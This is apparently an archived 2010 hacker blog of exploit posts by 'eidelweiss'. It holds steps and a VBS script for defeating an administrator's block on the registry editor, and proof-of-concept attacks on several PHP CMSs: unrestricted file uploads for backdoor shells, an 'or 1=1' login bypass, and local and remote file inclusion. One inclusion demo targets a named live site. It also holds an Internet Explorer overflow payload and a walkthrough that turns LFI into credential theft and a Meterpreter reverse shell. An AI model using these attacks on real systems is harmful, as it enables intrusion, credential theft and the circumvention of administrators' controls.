2010/12/13

ByPass Disbled registry editor (regedit)





How do you enable Registry Editing again if it has been disabled by your administrator ?

Here i will share the secret how to bypass it in 4 step (Method), Check This Out.

First Method:

Click Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Set it to Not Configured.

Second Method:

Click Start -> Run. Type this command in Run box and press Ok.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0

Then a prompt will come up with this question: Value DisableRegistryTools exists, overwrite (Y/N)? Type yes and hit Enter.

After u did that also type this command in the run box and hit enter.
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0

Then it will also come up with the question: Value DisableRegistryTools exists, overwrite (Y/N)? Type yes and hit Enter.

Third Method:

STEP1. Disable as much as you can from your startup. Remove programs from your startup folder and such, so as not to lag down the bootup process.

STEP2.Create a new shortcut on your desktop, point it to "C:\Windows\regedit.exe"

STEP3.Log off, then log back on.

STEP4.As soon as you see your desktop, double click on the shortcut. The system does not check for policies until a few seconds after it booted up. If you click on the icon fast enough, it should let you get in. After you close it though, it will not open unless you redo step 3 and 4.

Fourth Method:

Getting into the registry editor by making a vbs script in notepad: Open Notepad and copy this script into it. And save it as regtool.vbs on your desktop. VBS SCRIPT(select everything and copy into notepad and save as regtool.vbs):

Option Explicit
'Declare variables
Dim WSHShell, rr, rr2, MyBox, val, val2, ttl, toggle
Dim jobfunc, itemtype
On Error Resume Next
Set WSHShell = WScript.CreateObject("WScript.Shell")
val = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
val2 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
itemtype = "REG_DWORD"
jobfunc = "Registry Editing Tools are now "
ttl = "Result"
'reads the registry key value.
rr = WSHShell.RegRead (val)
rr2 = WSHShell.RegRead (val2)
toggle=1
If (rr=1 or rr2=1) Then toggle=0
If toggle = 1 Then
WSHShell.RegWrite val, 1, itemtype
WSHShell.RegWrite val2, 1, itemtype
Mybox = MsgBox(jobfunc & "disabled.", 4096, ttl)
Else
WSHShell.RegDelete val
WSHShell.RegDelete val2
Mybox = MsgBox(jobfunc & "enabled.", 4096, ttl)
End If


Open regtool.vbs And there you go!

Note: This written for educational purpose only , I or Author will be not responsible for any damage.

2010/12/01

Digitalus 1.10.0 Alpha2 Arbitrary File Upload vulnerability




########################################################
Digitalus 1.10.0 Alpha2 Arbitrary File Upload vulnerability
########################################################


____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ By:eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/


[+]Script: Digitalus
[+]Version: 1.10.0 Alpha2
[+]vendor: http://digitaluscms.com/
[+]Download: http://digitalus-cms.googlecode.com/files/digitalus_1.10.0_alpha2.zip
########################################################

[!]Author : eidelweiss
[!]Contact: eidelweiss[at]windowslive[dot]com
[!]Blog: http://eidelweiss-advisories.blogspot.com
[!]Gratz : DealCyber member`s , yogyacarderlink crew , and YOU !!!

[!]Dork: "Powered By Digitalus cms"

Original Advisories:

http://eidelweiss-advisories.blogspot.com/2010/11/awcm-v22-auth-bypass-vulnerabilities.html

-=[Advisories time]=-

[-] 25 desember 2010 (gmt+7) vulnerability found
[-] 25 desember 2010 (gmt+7) vulnerability analisys and testing
[-] 26 desember 2010 (gmt+7) vulnerability report to vendor (first time report and no response)
[-] 28 desember 2010 (gmt+7) vulnerability report to vendor (again still no response)
[!] 01 desember 2010 22:00 (gmt+7) vulnerability publish

########################################################

-=[Description]=-

Digitalus CMS is a new kind of CMS. The focus of this open source project is usable software as opposed to endless lists of features.
We added a very flexible API to this base so you can customize virtually any aspect of the system.
This creates a simple and elegant platform that you can use for a wide range of sites and requirements.

########################################################

-=[VUln Code]=-

path/scripts/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/media/' ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked


########################################################

-=[ How To Exploit / P0C ]=-

1. attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked using remode code execution.
2. Attacker also can exploit this vulnerability via browser by following this link

http://127.0.0.1/scripts/fckeditor/editor/filemanager/connectors/test.html

or

http://127.0.0.1/scripts/fckeditor/editor/filemanager/connectors/uploadtest.html

[*] your file while be here

http://127.0.0.1/media/yourfile.extension <= here

########################################################


| -=[MERRY CHRISTMAS AND HAPPY NEW YEARS , Nothing impossible in this world even nobody`s perfect]=- |

=========================| -=[ E0F ]=- |============================

2010/11/17

AWCM v2.2 Auth Bypass Vulnerabilities




########################################################
AWCM v2.2 Auth Bypass Vulnerabilities
########################################################


____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ By:eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/


[+]Script: AWCM
[+]Version: 2.2 final
[+]Download: http://sourceforge.net/projects/awcm/files/AWCM%20v2.2/AWCM%20v2.2%20final.zip/download
########################################################

[!]Author : eidelweiss
[!]Contact: eidelweiss[at]windowslive[dot]com
[!]Blog: http://eidelweiss-advisories.blogspot.com
[!]Gratz : DealCyber member`s , yogyacarderlink crew , and YOU !!!

Original Advisories:


########################################################

-=[Description]=-

ar web content manager is a free web contemts management system (cms) built with php , mysql , css , javascript , css to allow you to manage your website easily and fast.
it contains many main categories such as (videos, topics, sounds, photo gallery.

########################################################

-=[VUln Code]=-


first lets we see the code on login.php file

**********************************

include ("header.php");



$pusername = $_POST['username'];
$ppassword = md5($_POST['password']);
$premember = $_POST['remember'];

$mysql_login547_query = mysql_query("SELECT username,password,id FROM
awcm_members WHERE username = '$pusername' AND password = '$ppassword'");
$mysql_login547_total = mysql_num_rows($mysql_login547_query);
$mysql_login547_row = mysql_fetch_array($mysql_login547_query);
---------
**********************************

ok, now we see the code in control/login.php file
and on this file i see the vulnerability code that can be used by attacker or anonymous to bypass the login section..
its also possible to gain the administrator access ( if you lucky ofcourse :D )

here the code on control/login.php file:

**********************************
$page = 'login';
include ("common.php");

if(isset($_GET['do'])) {
$user = $_POST['username']; // <= i dont give fuck
$pass = md5($_POST['password']); //

$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");
$cp_login_total = mysql_num_rows($cp_login_query);

**********************************


########################################################

-=[ How To Exploit / P0C ]=-

put as username : 'or 1=1/*

=========================| -=[ E0F ]=- |============================

2010/10/21

New metode and style hack windows server using LFI and new type of backdoor (.exe)



Local File Inclusion attacks are among the most common vulnerabilities seen against web applications. Because they’re thought to be relatively benign, most organizations dismiss the large security risk they potentially create. In this paper I’ll present an attack against a site where the only known vulnerability is a web application that’s vulnerable to Local File Inclusion.

The host is a Windows system running XAMP to supply Apache, MySQL and PHP. The site is running the Joomla! web application and has a single vulnerable plugin installed: com_ganalytics. This is the Google Analytics plugin used by Joomla site operators to track site usage.

The vulnerable piece of code that makes LFI possible is found in the ganalytics.php file. It’s the following:

if($controller = JRequest::getVar(‘controller’)) {
require_once (JPATH_COMPONENT.DS.’controllers’.DS.$controller.’.php’);
}

The ‘controller‘ parameter accepts the path passed to it without any verification. This small mistake will allow an attacker to traverse the entire file system.

I was able to use this code in the following manner to read files on the local machine.

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\boot.ini%00

This returned the following in my browser…

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /noexecute=optin /fastdetect

Nice…

After a bit of research about the Joomla database layout, I learned that the jos_users table is the one that contains the user information. Everything from the password hashes and salts to user email addresses are kept in that table.

Using the same directory traversal used earlier, we’ll attempt to read the MySQL data file containing user credentials using the following:

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00

with the following result…

þ>��� Administrator admin administrator@localhost-db.comA115def1b208327f20d85b65aa7dc2440:UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I Super Administrator 9²þG ��ìnH H ���m�admin_language=language= editor= helpsite= timezone=0 ��

The red highlighted portion of the above output is the important part. This is the Joomla site administator’s password hash and salt separated by a colon.

hash=115def1b208327f20d85b65aa7dc2440
salt=UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I

After a bit of research at the following site ‘http://forum.joomla.org/viewtopic.php?f=432&t=207689‘ we learn about how the joomla password is calculated.

It is an md5 digest of the ‘cleartext password+salt‘

With this knowledge the easiest way into the administrative interface is probably to brute force the administrator password.

We navigate to the administator account settings page and start looking for a location to inject the following PHP code that would allow us to execute commands on the local system.



We use the Tamper Data Firefox plugin to inject the PHP base64 decode shell into the ‘language’ field.

At this point we now have the ability to run commands on the system. The process of doing so involves the following

* base64 encoding our command
* injecting the base64 encoded text into the ‘cmd’ parameter
* running the command by calling the base64 decoder shell that we injected into the database.

So let’s give it a shot. We’ll base64 encode the “dir” command

http://localhost/joomla/index.php?option=com_ganalytics&cmd=ZGlyCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD

with the following result:

(sorry hidden for Privacy)


Nice. The next step is to get something a bit more ‘potent’ on the system so that we get shell access.

We’re going to make use of PHP’s $_FILES variable to create a file uploader that we can use to put our payload on the local file system.

root@bt:~/ctp/traversal/joomla# cat upload.php

$upload="echo \"\" > d.php";
$output=base64_encode($upload);
echo $output;
?>

ok now we try to pop up the shell

root@bt:~/ctp/traversal/joomla# echo shell.exe | base64
c2hlbGwuZXhlCg==
root@bt:~/ctp/traversal/joomla#

http://localhost/joomla/index.php?option=com_ganalytics&cmd=c2hlbGwuZXhlCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00


Meanwhile on the attacking machine…

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.77.236:443
[*] Starting the payload handler…
[*] Sending stage (748032 bytes) to 172.16.77.246
[*] Meterpreter session 2 opened (172.16.77.236:443 -> 172.16.77.246:1682)

meterpreter > getuid
Server username: JOOMLA\Administrator
meterpreter > shell
Process 2640 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xamp\htdocs\joomla>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : example.com
IP Address. . . . . . . . . . . . : 172.16.77.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.77.8

C:\xamp\htdocs>

Game Over..!!!


At this point attacker can use this machine as pivot to attack other machines within the network, install trojans, place rogue code on the webserver, etc.. The only limit is how creative they are. So the next time you run that vulnerability scanner against your web application farm, don’t be so quick to dismiss the potential damage of the RFI/LFI results.

2010/10/05

CuteNews (page) local File Inclusion Vulnerability



==================================================
CuteNews (page) local File Inclusion Vulnerability
==================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

-=[p0c]=-

http://127.0.0.1/index.php?page= [lfi]
or
http://127.0.0.1/path/index.php?page=/etc/passwd

-=[Demo p0c]=-

http://www.christyle.org/index.php?page=/etc/passwd

=========================| -=[ E0F ]=- |============================

2010/09/08

Internet Download Accelerator 5.8 Remote Buffer Overflow PoC

==================================================================
Internet Explorer ver 7.0.5730.13
Tested On Windows SP2
Inj3ct0r team & yogyacarderlink team
Bug discovered by eidelweiss
Affected Software: idaiehlp.dll BHO: IE 4.x-6.x BHO for Internet Download Accelerator - {2A646672-9C3A-4C28-9A7A-1FB0F63F28B6}
DLL VER : 2.4.1.110
program ver : 5.8.3.1221
download link : http://download1.westbyte.com/ida/idasetup.exe
vendor www. westbyte.com
www.inj3ct0r.com
www.yogyacarderlink.web.id
==================================================================
html
object classid="clsid:2A646672-9C3A-4C28-9A7A-1FB0F63F28B6" id="idaiehlp"
script language="'vbscript'"
arg1=String(9696969, "A") + String(999999, unescape("%960"))
idaiehlp.NotSafe (arg1)

2010/08/27

pecio CMS v2.0.5 (template) Multiple Remote File Include Vulnerability

================================================================
pecio CMS v2.0.5 (template) Multiple Remote File Include Vulnerability
================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Software Link: http://pecio-cms.com/
Download: http://pecio-cms.com/pec_upload/files/pecio-2.0.5.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

Greetz: Inj3ct0r.com (Inj3ct0r Exploit DataBase), YOGYACARDERLINK, and all Indonesian Hacking Community.
Special Thank`s To: iwe a.k.a KirD , PKI a.k.a Andri klaten, m4rc0 (Thx so much,you know why and i`ll never forget you all)

================================================================

Pecio is a content management system written in PHP with the intention to be a small, simple and lightweight cms for people who want to create websites including old-style information and new-style blog part.
It doesn't mainly focus on ease of use and full featured user experience but rather on being a flexible and lightweight content editing solution for web masters.

================================================================

-=[ Vuln c0de ]=-

include('pec_templates/' . $pecio->get('template')->get_directory_name() . '/header.php'); ?>

include('pec_templates/' . $pecio->get('template')->get_directory_name() . '/footer.php'); ?>

================================================================

-=[ p0c ]=-

http://sample.site/pecio_path/pec_templates/nova-blue/post.php?template= [inj3ct0r sh3ll]
http://sample.site/pecio_path/pec_templates/nova-blue/article.php?template= [inj3ct0r sh3ll]
http://sample.site/pecio_path/pec_templates/nova-blue/blog.php?template= [inj3ct0r sh3ll]
http://sample.site/pecio_path/pec_templates/nova-blue/home.php?template= [inj3ct0r sh3ll]

================================================================

Nb:
Script kiddies please learn more about RFI vulnerability, its not just about include and require.
if just need or want to get name or exist , so people call you hacker after post or publish shit exploits it`s wrong way i thing !!!

=========================| =[Hacking Is Art]=- |======================

2010/08/25

Ananta Gazelle CMS Shell Upload Vulnerability




==========================================================
Ananta Gazelle CMS Shell Upload Vulnerability
==========================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Software Link: www.anantasoft.com
Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

Special Thank`s To: iwe a.k.a KirD , PKI a.k.a Andri klaten, m4rc0, and YOU !!!!!

================================================================

This vulnerability isssue can be exploited or use by attacker to upload arbitary shell script to gain access,
or data.

1. You Need To Register Your self
2. When your account active (registed) after activate your account by clicking on following link in your mail,
then login with type your user name and password .
3. after you login successful click "To admin panel" or "To user panel" and/or you will be direct to

http://sample.site/ananta_path/admin
or
http://sample.site/ananta-path/user.php

4. Then go to or copy and paste this link:

"/admin/editor/filemanager/frmupload.html" // (without quote)

ex: http://sample.site/admin/editor/filemanager/frmupload.html

5. Upload your script backdoor shell there
6. If success or lucky your backdoor shell can be check or will be available here:

http://sample.site/admin/editor/backdoorshellfile.extention (Ananta_Gazelle1.0/admin/editor/filemanager/connectors/php/config.php //line 27)

or

http://sample.site/user/backdoorshellfile.extention (Ananta_Gazelle1.0/admin/editor/filemanager/connectors/php/config.php //line 27)


NOTE: Edit your backdoor shell by adding GIF or JPG source, so you can get the shell.


=========================| -=[ E0F ]=- |============================

2010/08/06

ccTiddly v1.7.6 Multiple Remote File Include Vulnerability





================================================================
ccTiddly v1.7.6 Multiple Remote File Include Vulnerability
================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Developer: http://tiddlywiki.org/wiki/CcTiddlyDeveloper
Download: http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.6.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

================================================================

ccTiddly is a collaborative server side version of TiddlyWiki.

Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/7336/)
Vendor Not Fix the vulnerability in all folder !!!

================================================================

-=[Vuln C0de]=-

[!] path/includes/include.php

include_once($cct_base."includes/ccAssignments.php");

[!] path/includes/workspace.php

include_once($cct_base."includes/header.php");
include_once($cct_base."includes/user.php");
include_once($cct_base."includes/tiddler.php");

================================================================

-=[P0C]=-

http://127.0.0.1/path/includes/include.php?cct_base= [inj3ct0r sh3ll]

http://127.0.0.1/path/includes/workspace.php?cct_base= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |============================

2010/08/03

68KB v1.0.0rc4 Remote File Include Vulnerability




====================================================
68KB v1.0.0rc4 Remote File Include Vulnerability
====================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Vendor: http://68kb.com
download: http://github.com/68designs/68KB/downloads
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.

Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)
Vendor Not Fix the vulnerability in all File Directory !!!

=====================================================================

-=[ vuln c0de ]=-

[!] path/themes/admin/default/modules/show.php





=====================================================================

-=[ P0C ]=-

http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]



=========================| -=[ E0F ]=- |=================================

2010/07/24

DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit




/*
-----------------------------------------------------------------
DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.dutchmonkey.com
Download : http://www.dutchmonkey.com/?file=downloads.html&label=Downloads
exploited by ..: eidelweiss
Affected: version 3.9.11
details..: works with an Apache server with the mod_mime module installed (if specific)

[-] vulnerable code in /path/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/userfiles/' ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
